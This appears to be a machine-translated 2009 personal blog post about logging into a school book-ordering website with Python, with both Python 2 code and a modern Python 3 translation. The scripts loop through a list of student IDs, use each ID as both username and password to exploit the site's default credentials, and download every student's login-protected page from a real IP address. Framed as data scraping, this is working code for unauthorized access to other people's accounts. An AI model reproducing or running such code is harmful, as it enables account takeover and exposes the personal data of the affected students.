Journal

Web Scraping with Python for Login-Protected Websites

2009·06·26

Machine-translated from Chinese.

Last Time’s Introduction

Last time, I introduced using PHP with the curl library to crawl scores. Python scripts can complete similar tasks, and they do it very nicely — I'm growing fonder and fonder of Python, haha. This time, my target is the school's book-ordering website. The system has a huge loophole: every user's default username and password are identical. So I used it to practice information crawling. Here is the Python code:

import urllib, urllib2, cookielib
import re
# Dictionary file: one student ID per line.  Each ID is used as both
# the username and the password, since the system's defaults are identical.
f = open("dictionary address", "r")
username = f.readline().rstrip()
txt_last = ""
while username != '':
    # A fresh cookie jar for each user; installing the opener makes every
    # later urlopen() call store and send this session's cookies.
    a = cookielib.CookieJar()
    b = urllib2.build_opener(urllib2.HTTPCookieProcessor(a))
    urllib2.install_opener(b)
    # Pre-encoded fragments of the ASP.NET login URL, captured from the
    # form's POST data.  dust1+dust2+dust3+dust4+dust5 is the full URL.
    dust1 = 'http://211.82.90.56:8080/caubook/TeacherLog.aspx?' + \
            '__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgICBw8PZBY' + \
            'CHgdvbmNsaWNrBSdpZih0aGlzLmRpc2FibGVkPT1mYWxzZSl7cmV' + \
            '0dXJuICBiYygpO31kZP%2B9YQS1SQoVhX0gctevArgHvY9U&Tbusername='
    dust2 = username
    dust3 = '&Tbuserpwd='
    dust4 = username
    dust5 = '&RadioButtonList1=%E5%AD%A6%E7%94%9F&Button1=%E7%A1%AE%E8%AE%A4&__EVENTVALIDATION' + \
            '=%2FwEWBwKZqo6EDgKS6L7%2FCwK1gprrAQLo4%' + \
            '2BrNDQLN7c0VAveMotMNAoznisYGXMvRojLDcm7L2wkg34m0QFH3k5c%3D'
    # Log in; the response sets the session cookie in the jar.
    response = urllib2.urlopen(dust1 + dust2 + dust3 + dust4 + dust5)
    # With the cookie saved, fetch the login-protected page.
    page = urllib2.urlopen('http://211.82.90.56:8080/caubook/Student/StuAna1.aspx')
    txt = page.read()
    # Only print pages that differ from the previous one (failed logins
    # all return the same page).
    if txt != txt_last:
        txt_last = txt
        # txt = re.compile(r'<[^>]+>').sub('', txt)  # optionally strip HTML tags
        print txt
    username = f.readline().rstrip()

The open() and readline() calls at the top open a file that serves as a dictionary. Each line in the file is a student ID, which is read in and submitted as both the username and the password (because the system defaults to making them identical). Now for the key parts of the program. dust1 through dust5 are the fragments that get concatenated into the submitted URL. They were obtained by analyzing the HTML form on the login page and capturing the POST request — that is, entering the URL composed of dust1+dust2+dust3+dust4+dust5 in a browser logs you into the system normally. This book-ordering system carries a lot of opaque state, and since I don't know ASP.NET, I can't say why all these fields must be submitted… The only parameters we care about are the ones following &Tbusername= and &Tbuserpwd= — one is the username, the other the password, and both are student IDs. We then use

response = urllib2.urlopen(dust1 + dust2 + dust3 + dust4 + dust5)

to submit this URL. The response sets a session cookie. I used to not know how to save such cookies; in Python, we only need to set

a = cookielib.CookieJar()

and then execute

b = urllib2.build_opener(urllib2.HTTPCookieProcessor(a))
urllib2.install_opener(b)

to let the program automatically save the cookie returned after submission. With that, we have simulated a browser submission and kept the returned cookie. All that remains is to request the page we want while the cookie is in effect (i.e., while logged in) — that is exactly what the urlopen call for StuAna1.aspx in the script does.
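For readers on modern Python, the same pattern translates directly: urllib2 and cookielib became urllib.request and http.cookiejar, and the hand-concatenated dust fragments can be built with urllib.parse.urlencode instead. Below is a minimal sketch of that translation — the form-field names mirror the ASP.NET form above, the student ID is an invented example, and the __VIEWSTATE/__EVENTVALIDATION values are placeholders you would capture from the live page:

```python
import http.cookiejar
import urllib.request
from urllib.parse import urlencode

# Cookie jar + opener: every response's Set-Cookie is stored in the jar
# and sent back automatically on later requests through this opener.
jar = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
urllib.request.install_opener(opener)

def build_login_url(student_id, viewstate, eventvalidation):
    # Field names mirror the login form; the student ID doubles as the
    # password, as described above.
    params = {
        "__VIEWSTATE": viewstate,
        "Tbusername": student_id,
        "Tbuserpwd": student_id,
        "RadioButtonList1": "学生",   # the "student" radio button
        "Button1": "确认",            # the "confirm" button
        "__EVENTVALIDATION": eventvalidation,
    }
    # urlencode percent-encodes every value, so no fragments need to be
    # pasted together by hand.
    return ("http://211.82.90.56:8080/caubook/TeacherLog.aspx?"
            + urlencode(params))

url = build_login_url("20050001",                      # invented example ID
                      "VIEWSTATE_PLACEHOLDER",
                      "EVENTVALIDATION_PLACEHOLDER")
# urllib.request.urlopen(url) would log in and store the session cookie;
# a second urlopen(...) on the protected page would then succeed.
```

Since install_opener() replaces the module-level opener, plain urlopen() calls after it share the cookie jar — the same trick the Python 2 script relies on.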

In summary, a few simple lines of code implement simulated login and cookie saving, which can be put to many more uses. My task this time was just crawling data, so I won't discuss it further — you can research the rest yourself :)
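One small post-processing step worth mentioning: the commented-out regex in the script strips HTML tags from the downloaded page, leaving only the text between them. A sketch of that idea (good enough for a quick one-off script; a real HTML parser is safer on messy markup — the sample row below is invented):

```python
import re

TAG = re.compile(r"<[^>]+>")  # matches a single HTML tag such as <td>

def strip_tags(html):
    # Crude but effective for quick scraping of simple pages: delete
    # every tag and keep whatever text remains.
    return TAG.sub("", html)

print(strip_tags("<tr><td>20050001</td><td>Data Structures</td></tr>"))
# -> 20050001Data Structures
```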

P.S. When crawling data, please respect others’ privacy and do not damage others’ data. Those who violate this rule will be responsible for their own actions.
